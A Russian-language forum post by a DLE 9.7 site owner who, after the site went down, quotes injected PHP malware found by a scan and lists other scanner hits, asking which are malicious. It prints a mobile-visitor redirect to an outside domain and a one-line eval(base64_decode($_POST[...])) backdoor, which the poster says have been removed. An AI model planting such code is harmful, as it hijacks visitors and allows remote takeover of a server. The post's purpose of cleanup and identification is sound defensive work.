Здравствуйте, сегодня упал сайт, запустил проверку на вредоносный код и ужаснулся. Во первых сразу расскажу о новом редиректе которые лезет через дыры в DLE 9,7
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
Эту нечисть всю удалил, поставил патч безопасности. Но остались еще некоторые сомнительные моменты. Нужна ваша помощь, что есть вредоносный код а что нет (из результатов сканирования):
/testioncube.php
lse; if (!is_ms_windows()) { $cmd = @
shell_exec('sestatus'); $se_enabled = preg_matc
/engine/classes/antivirus.class.php
ripts/tiny_mce/plugins/spellchecker/classes/PSpell
shell.php", "./engine/editor/jscripts/tiny_mce/plugin
/engine/modules/functions.php
e), 5 ); return $totaltime; } } function
FLoodeR($ip, $news_time = false) { global $config, $db;
/engine/modules/addnews.php (кусков со словом "FLoodeR" много в разных файлах )member_id['user_group']]['flood_news'] ) { if(
FLoodeR( $member_id['name'], $user_group[$member_id['use
/engine/editor/scripts/common/spectrum/spectrum.js
"fa8072",sandybrown:"f4a460",seagreen:"2e8b57",sea
shell:"fff5ee",sienna:"a0522d",silver:"c0c0c0",skyblue:
/pkinopoisk/testioncube.phprestrictions || $system_restrictions; return
(ini_get('safe_mode') || (!$only_safe_mode && $non_safe_mode_restrictio
/engine/inc/dumper.php} } else { $result = mysql_query("
SHOW DATABASES"); $dbs = array(); while($item = my
/testioncube.php} EOT; } function logo_page() { $img_encoded = '
iVBORw0KGgoAAAANSUhEUgAAAU4AAABQCAMAAABBJmwEAAADAFBMVEVBLA49Dg44Dg5FDg46DAxLIBIw
подобные куски повторяются в нескольких файлах, интересно знать что из этого вредоносно а что нет. Заранее благодарен